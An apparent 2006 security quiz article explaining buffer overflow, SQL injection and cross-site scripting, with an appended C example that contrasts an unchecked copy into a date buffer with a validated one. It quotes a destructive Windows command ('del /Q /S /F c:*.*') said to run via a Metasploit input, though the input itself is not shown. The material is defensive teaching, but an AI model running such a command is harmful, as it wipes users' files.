Identifying buffer overflow attack

By balaji

August 6, 2006

An attacker enters a long, nasty-looking string into the date field. The input overwrites parts of the running program and executes commands on the server. What type of attack just took place?

  1. SQL Injection attack
  2. Buffer Overflow attack
  3. Cross Site Scripting attack

The correct answer is 2) Buffer Overflow attack

In a SQL injection attack, an attacker enters a specially crafted value in an input field that the application uses to construct a dynamic query to the database. This results in the query being manipulated and more information being revealed to the attacker. We discuss the basics of SQL injection in the Learning Center. In June we analyzed how they affect stored procedures too, in the pages of Palisade.

In a buffer overflow attack, the input takes more space than was allocated for the variable. It overflows the allocated buffer and overwrites adjacent memory locations. When the input is carefully crafted, it lets the attacker run commands of his choice. Here's one such input, courtesy of the Metasploit project. It executes the command:

del /Q /S /F c:*.*


Read our discussion of the techniques to prevent buffer overflows in the back pages of Palisade.
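The overwrite of adjacent memory described above, and a length and format check that prevents it, shown as an added example that is not part of the original article. The `struct record` layout, the function names, the `SENTINL` marker and the YYYY-MM-DD date format are assumptions made for illustration, and the long input is constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#define DATE_LEN 10 /* "YYYY-MM-DD" */

/* Constructed layout: the date buffer, then whatever sits next in memory. */
struct record {
    char date[DATE_LEN + 1];
    char adjacent[8];
};

static void record_init(struct record *r) {
    memset(r, 0, sizeof *r);
    memcpy(r->adjacent, "SENTINL", 8); /* 7 chars + NUL, constructed marker */
}

/* Vulnerable pattern: input length drives the copy (capped to keep the demo defined). */
static void store_date_unchecked(struct record *r, const char *in) {
    size_t n = strlen(in) + 1;
    if (n > sizeof *r) n = sizeof *r;
    memcpy((char *)r, in, n);
}

/* Hardened: accept only an exact YYYY-MM-DD value, checked before any copy. */
static int store_date_checked(struct record *r, const char *in) {
    if (strlen(in) != DATE_LEN) return -1;
    for (size_t i = 0; i < DATE_LEN; i++) {
        if (i == 4 || i == 7) { if (in[i] != '-') return -1; }
        else if (!isdigit((unsigned char)in[i])) return -1;
    }
    memcpy(r->date, in, DATE_LEN + 1);
    return 0;
}

/* 1 if the bytes after the date buffer still hold their original value. */
static int adjacent_intact(const struct record *r) {
    return memcmp(r->adjacent, "SENTINL", 8) == 0;
}

int main(void) {
    const char *long_input = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; /* constructed */
    struct record r;
    record_init(&r);
    store_date_unchecked(&r, long_input);
    printf("unchecked: adjacent intact = %d\n", adjacent_intact(&r));
    record_init(&r);
    int rc = store_date_checked(&r, long_input);
    printf("checked: rc = %d, adjacent intact = %d\n", rc, adjacent_intact(&r));
    return 0;
}
```

The unchecked copy leaves the adjacent bytes overwritten, while the checked version rejects the same input before touching memory.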

A cross-site scripting (XSS) attack is aimed at stealing sensitive user information such as session tokens. A common attack method is to send the victim an email containing a link to a valid site, with JavaScript embedded in the URL. When the victim clicks on the link, the browser executes the script, which retrieves the user's cookies and mails them to the attacker. XSS was the topic of the April 2005 quiz.
